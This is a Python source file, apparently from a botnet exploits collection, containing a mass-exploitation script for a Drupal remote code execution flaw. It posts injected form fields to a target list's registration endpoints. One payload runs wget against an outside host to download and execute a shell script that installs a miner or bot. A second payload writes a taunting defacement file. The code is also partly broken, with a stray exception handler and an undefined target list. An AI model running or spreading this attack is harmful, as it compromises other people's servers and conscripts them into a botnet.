Path: blob/master/Botnets/Exploits/DRUPAL2/drupal2.py
5038 views
#!/usr/bin/env1import sys2import requests3import os4import base645from multiprocessing.dummy import Pool6789print ('##################################################')10print ('# DRUPAL2 EXPLOIT 90K BOTS #')11print ('##################################################')12131415sendMiner = True16sendMessage = True1718verify = False19headers = {'User-Agent': 'Mozilla 5.0 | xJesterino Was Here | Shoutout to drought!'}2021evil = "wget http://b4.ck.do.or/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"22messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "xJesterino is a god. Shout out to Drought. All your devices are belong to us. | Follow us on twitter: @xJesterino @decayable | Guess who pissed in your cheerios?" | tee ReadMeCVE.txt'}23minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}2425except IndexError:26exit('Usage: exploit.py list.txt threads')272829def run(targetLine):30try:31try:32targetLine = 'http://'+targetLine+'/'33url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'3435if sendMiner:36minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)37if sendMessage:38messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)39except requests.exceptions.RequestException as e:40pass4142print ('[+] Attempting: '+targetLine);4344except:45pass464748try:49multiThreads = Pool(int(sys.argv[2]))50except IndexError:51exit('Usage: exploit.py list.txt threads')52multiThreads.map(run, target)53multiThreads.close()54multiThreads.join()5556print("Finished File!")5758